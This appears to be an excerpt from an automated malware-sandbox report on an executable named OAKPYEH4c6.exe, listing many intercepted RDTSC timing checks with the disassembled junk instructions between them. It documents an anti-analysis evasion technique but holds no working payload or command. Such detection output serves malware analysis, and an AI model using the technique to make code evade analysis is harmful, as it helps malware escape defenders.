Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17C58FF second address: 17C5903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17C8250 second address: 17C8258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17C7F39 second address: 17C7F4C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3398F1B586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnp 00007F3398F1B586h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17C7F4C second address: 17C7F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 jmp 00007F33985001DAh 0x0000000e popad 0x0000000f jbe 00007F33985001FEh 0x00000015 jmp 00007F33985001E4h 0x0000001a push edx 0x0000001b jmp 00007F33985001DCh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D04E8 second address: 17D04F2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3398F1B586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D04F2 second address: 17D0507 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F33985001DEh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D0672 second address: 17D0678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D0678 second address: 17D06A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33985001E0h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F33985001E8h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D06A9 second address: 17D06AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D06AD second address: 17D06CB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F33985001E3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D06CB second address: 17D0702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 je 00007F3398F1B594h 0x0000000f push esi 0x00000010 jnl 00007F3398F1B586h 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3398F1B590h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D0702 second address: 17D0708 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D0708 second address: 17D0717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F3398F1B586h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D0892 second address: 17D0896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D0A0C second address: 17D0A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D0A10 second address: 17D0A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F33985001D6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176BE90 second address: 176BEAC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3398F1B586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007F3398F1B586h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 176BEAC second address: 176BEC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33985001E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D0B85 second address: 17D0B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 push edi 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D0B91 second address: 17D0B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D4F33 second address: 17D4F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3398F1B58Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D4F47 second address: 17D4F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D4F4B second address: 17D4F4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D4F4F second address: 17D4F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D4F60 second address: 17D4F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F3398F1B58Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D4F73 second address: 17D4F84 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F33985001DAh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D50D6 second address: 17D50DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D50DA second address: 17D50E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D50E0 second address: 17D5123 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F3398F1B586h 0x0000000b jmp 00007F3398F1B58Bh 0x00000010 jnc 00007F3398F1B586h 0x00000016 popad 0x00000017 jmp 00007F3398F1B594h 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jne 00007F3398F1B58Eh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D5266 second address: 17D5294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop eax 0x0000000d pushad 0x0000000e jno 00007F33985001D6h 0x00000014 jmp 00007F33985001E8h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D5294 second address: 17D529A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D567A second address: 17D567E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D57EE second address: 17D5807 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3398F1B595h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D5807 second address: 17D581C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F33985001DFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D581C second address: 17D5820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D5820 second address: 17D582E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D9CB3 second address: 17D9CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F3398F1B58Ch 0x0000000f jbe 00007F3398F1B586h 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jc 00007F3398F1B586h 0x0000001e push eax 0x0000001f pop eax 0x00000020 jmp 00007F3398F1B590h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D9CE4 second address: 17D9CF0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F33985001DEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D9CF0 second address: 17D9CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007F3398F1B586h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17D963E second address: 17D9642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E0577 second address: 17E057B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E057B second address: 17E0593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F33985001DDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E0593 second address: 17E05A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F3398F1B58Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E05A5 second address: 17E05A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E0BB3 second address: 17E0BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F3398F1B593h 0x0000000a pop edi 0x0000000b push eax 0x0000000c jns 00007F3398F1B58Ch 0x00000012 pushad 0x00000013 jmp 00007F3398F1B58Dh 0x00000018 jp 00007F3398F1B586h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E0E81 second address: 17E0E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F33985001E8h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E115F second address: 17E1177 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3398F1B58Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jno 00007F3398F1B586h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E1FC6 second address: 17E1FD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F33985001D6h 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E59D7 second address: 17E59EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007F3398F1B58Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E5E68 second address: 17E5E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E5E6E second address: 17E5E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E5E74 second address: 17E5E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E5E79 second address: 17E5EB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3398F1B58Dh 0x00000007 pushad 0x00000008 jg 00007F3398F1B586h 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 jc 00007F3398F1B586h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push edx 0x0000001c jmp 00007F3398F1B595h 0x00000021 pushad 0x00000022 push edx 0x00000023 pop edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E5EB7 second address: 17E5EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F33985001D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E6016 second address: 17E601A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E6196 second address: 17E61C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F33985001DCh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F33985001E8h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E61C5 second address: 17E61CB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E61CB second address: 17E61E3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F33985001DEh 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F33985001D6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E6345 second address: 17E635B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3398F1B58Ch 0x00000007 js 00007F3398F1B586h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E635B second address: 17E6366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F33985001D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E6492 second address: 17E6498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E6498 second address: 17E649C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E649C second address: 17E64A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E64A0 second address: 17E64AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E64AC second address: 17E650B instructions: 0x00000000 rdtsc 0x00000002 je 00007F3398F1B586h 0x00000008 jmp 00007F3398F1B58Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 jmp 00007F3398F1B590h 0x00000018 jmp 00007F3398F1B597h 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F3398F1B599h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E650B second address: 17E6517 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnc 00007F33985001D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17E6517 second address: 17E6545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 js 00007F3398F1B586h 0x00000009 jmp 00007F3398F1B590h 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F3398F1B58Bh 0x00000015 jno 00007F3398F1B586h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17F256A second address: 17F2570 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17F26E5 second address: 17F26F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17F26F8 second address: 17F2729 instructions: 0x00000000 rdtsc 0x00000002 je 00007F33985001ECh 0x00000008 jmp 00007F33985001E6h 0x0000000d pushad 0x0000000e jmp 00007F33985001E0h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17F2BD7 second address: 17F2C01 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3398F1B586h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F3398F1B59Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17F2D8A second address: 17F2DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F33985001E9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17F2DA9 second address: 17F2DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17F2DAD second address: 17F2DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F33985001E2h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jo 00007F33985001EEh 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17F2DD5 second address: 17F2DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17FAC28 second address: 17FAC42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33985001E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1802353 second address: 1802359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1802359 second address: 1802363 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F33985001D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1802363 second address: 1802369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1802369 second address: 180236D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1809BB9 second address: 1809BDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3398F1B596h 0x00000007 pushad 0x00000008 ja 00007F3398F1B586h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 180F448 second address: 180F453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F33985001D6h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 181340D second address: 1813411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 181356E second address: 1813573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1813573 second address: 181357D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F3398F1B586h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 181357D second address: 18135A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F33985001E9h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 18135A6 second address: 18135AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 18135AC second address: 18135B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 18135B0 second address: 18135B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 18135B4 second address: 18135BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
